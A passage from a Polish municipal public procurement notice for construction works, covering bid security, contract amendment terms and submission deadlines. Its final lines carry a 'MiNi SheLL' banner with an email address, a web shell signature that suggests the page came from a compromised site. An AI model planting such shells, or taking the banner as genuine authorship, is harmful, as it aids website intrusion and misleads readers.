sześć<br/>tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1} pieniądzu;<br/>2} gwarancjach bankowych;<br/>3} gwarancjach ubezpieczeniowych;<br/>4} poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Wadium w formie pieniądza należy w nieść przelewem na konto Zamawiającego {Banku<br/>Spółdzielczym w Niedrzwicy Dużej nr konta: 47 8687 0009 2002 2500 0127 0025 z dopiskiem:<br/>„Wadium na postępowanie znak: INFR.7010.58.2021”. Za skuteczne wniesienie wadium w<br/>pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym<br/>Zamawiającego przed upływem terminu składania ofert.<br/>4. Jeżeli wadium jest wnoszone w formach określonych w ppkt 2-4, Wykonawca przekazuje<br/>Zmawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej, przed upływem<br/>składania ofert.<br/>5. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub<br/>poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na<br/>pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i<br/>powinna zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), nazwę beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), nazwę gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>poręczenia lub gwarancji) lub poręczyciela oraz wskazanie ich siedzib;<br/>2) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie PZP;<br/>3) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>4) bezwarunkowe i nieodwołalne zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego, w terminie związania<br/>ofertą, sporządzone zgodnie z obowiązującymi przepisami;<br/>5) termin ważności gwarancji/poręczenia zgodny z terminem związania ofertą „od dnia .. – do<br/>dnia ….”;<br/>6) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP),<br/>Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią (tj.<br/>zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub<br/>nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o<br/>zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7. Zamawiający zwróci wadium wszystkim Wykonawcom, zgodnie z art. 98 ust. 1 - 4 ustawy Pzp.<br/>8. Zamawiający zatrzyma wadium wraz z odsetkami, na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, w art. 454 i 455 ustawy – Pzp, strony dopuszczają możliwość<br/>wprowadzania zmiany umowy w stosunku do treści oferty, w przypadku wystąpienia<br/>którejkolwiek z następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamów., o którym w § 4 ust. 1, może nastąpić w przypadku<br/>wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od<br/>żadnej ze stron, zewn. niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie<br/>umowy, w szczególności:wojny,akty terroryzmu,klęski żywio., strajki oraz akty władzy i adm.<br/>Publ., przedłużenie terminu Real.zamów. nastąpi o liczbę dni, odpowiadającą okresowi<br/>występow. okoliczności siły wyższej, 2) przedłużenie terminu realizacji zamów.,w § 4 ust. 1,<br/>może nastąpić w przypadku skierowania przez Zamaw. do Wykonawcy pisemnego żądania<br/>wstrzymania robót bud., stanowiących przedmiot zam. lub wydania zakazu prowadzenia robót<br/>bud., stanowiących przedmiot zam. przez organ adm. publicznej lub eksploratorów<br/>infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca<br/>ponosi odpowiedzialność, przedłużenie terminu realizacji zamów. nastąpi o liczbę dni,<br/>odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót lub zakazano<br/>prowadzenie robót budo.3) przedłużenie terminu realizacji zamów., w § 4 ust. 1, może nastąpić<br/>w przypadku wystąpienia kolizji z instalacjami wewn. nieujawnionymi w dokum. projektowej, lub<br/>innymi robotami prowadzonymi przez innego wykonawcę, przy czym przedłużenie terminu<br/>realizacji zamów. nastąpi o liczbę dni niezbędną Wykonawcy na usunięcie kolizji z instalacjami<br/>wewn.nieujawnionymi w dokumentaji lub o liczbę dni niezbędnych do wykonania robót przez<br/>innego wykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia terminu; 4)<br/>przedłużenie terminu Real. zamów., o którym mowa w § 4 ust. 1, może nastąpić w przypadku<br/>wystąp. konieczności wprowadzenia w dok. projekt.zmian, powodujących wstrzymanie lub<br/>przerwanie robót ., stanowiących przedmiot zamów., przy czym przedłużenie terminu<br/>realiz.zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dok. projektowej<br/>oraz do przeprowadzenia uzgodnień z właściwymi organami, uzyskania opinii właściwych<br/>organów oraz wydania decyzji przez właściwe organy, wprowadzenie w dokumentacji zmian nie<br/>może skutkować zwiększeniem zakresu świadczenia Wykonawcy zawartego w ofercie,<br/>stanowiącej zał. do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, w § 5 ust. 1, 5)<br/>przedłużenie terminu realizacji zamów., o którym mowa w § 4 ust. 1, może nastąpić w przypadku<br/>wystąp. warunków geologicznych lub hydrologicznych odmiennych od założonych w dok.<br/>projekt. i powodujących konieczność wstrzymania robót lub konieczność ich wykonania przy<br/>wykorzystaniu odmiennych od zaprojektowanych rozwiązań techn., przy czym przedłużenie<br/>terminu realiz. zamówienia nastąpi o liczbę dni niezbędną do wyeliminowania utrudnień<br/>związanych z ich wystąpieniem <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Na stronie internetowej prowadzonego postępowania:https://platformazakupowa.pl/pn/borzechow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Cd. z sekcji VII - Projektowane postanowienia umowy.<br/>6) przedłużenia terminu wykonania zamów.w zakresie niezbędnym do wykonania robót<br/>zleconych na podst.art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ust. Pzp, 7) zmiany powszechnie<br/>obowiązujących przepisów prawa w zakresie mającym wpływ na Real. przedmiotu zamów.lub<br/>świadczenia stron umowy, 8) w przypadku zmiany albo rezygnacji z podwyk.,na którego zasoby<br/>wykonawca powoływał się w celu wykazania spełniania warunków udziału w postęp.Wykonawca<br/>jest obowiązany wykazać Zamaw., iż proponowany inny podwykonawca lub Wykonawca<br/>samodzielnie spełnia warunki udziału w postęp., w stopniu nie mniejszym niż wymagany w<br/>trakcie postęp. o udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich<br/>dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu, 9) zmiany<br/>sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykon. wskutek zaistnienia<br/>przyczyn organizacyjnych lub finansowych leżących po stronie Zamaw., w tym na skutek<br/>zawartej przez Zamaw. umowy o dofinansowanie zadania.<br/>10) wszelkie zmiany, które będą konieczne do zagwarantowania zgodności umowy z<br/>wchodzącymi w życie po terminie składania ofert lub po zawarciu umowy przepisami prawa w<br/>szczególności przepisami o podatku od towarów i usług w zakresie wynikającym z tych<br/>przepisów.

Creat By MiNi SheLL
Email: jattceo@gmail.com